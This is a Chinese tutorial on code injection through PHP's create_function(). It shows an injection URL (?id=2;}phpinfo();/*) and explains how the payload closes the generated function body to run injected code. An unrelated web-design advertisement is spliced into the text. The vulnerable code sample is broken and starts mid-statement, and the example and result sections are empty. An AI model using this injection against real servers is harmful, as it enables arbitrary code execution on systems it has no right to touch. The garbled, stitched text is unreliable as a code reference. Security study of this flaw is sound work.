第一部分:介绍php函数 create_function():
创新互联建站专注于企业成都营销网站建设、网站重做改版、白银区网站定制设计、自适应品牌网站建设、html5、购物商城网站建设、集团公司官网建设、成都外贸网站建设公司、高端网站制作、响应式网页设计等建站业务,价格优惠性价比高,为白银区等各大城市提供网站开发制作服务。
string create_function ( string $args , string $code )
string $args变量部分
string $code 方法代码部分
举例:
create_function('$fname','echo $fname."Zhang"')类似于:
function fT($fname) {
echo $fname."Zhang";
}举一个官方提供的例子:
第二部分:如何利用create_function()代码注入
测试环境版本:
apache +php 5.2、apache +php 5.3
有问题的代码:
"; echo "=============================="; echo "
"; $f1 = create_function('$a',$str2); echo "
"; echo "=============================="; ?>
利用方法:
http://localhost/libtest/02-8.php?id=2;}phpinfo();/*
实现原理:
由于id=2;}phpinfo();/*
执行函数为:
源代码:
function fT($a) {
echo "test".$a;
}
注入后代码:
function fT($a) {
echo "test";}
phpinfo();/*;//此处为注入代码。
}测试效果:
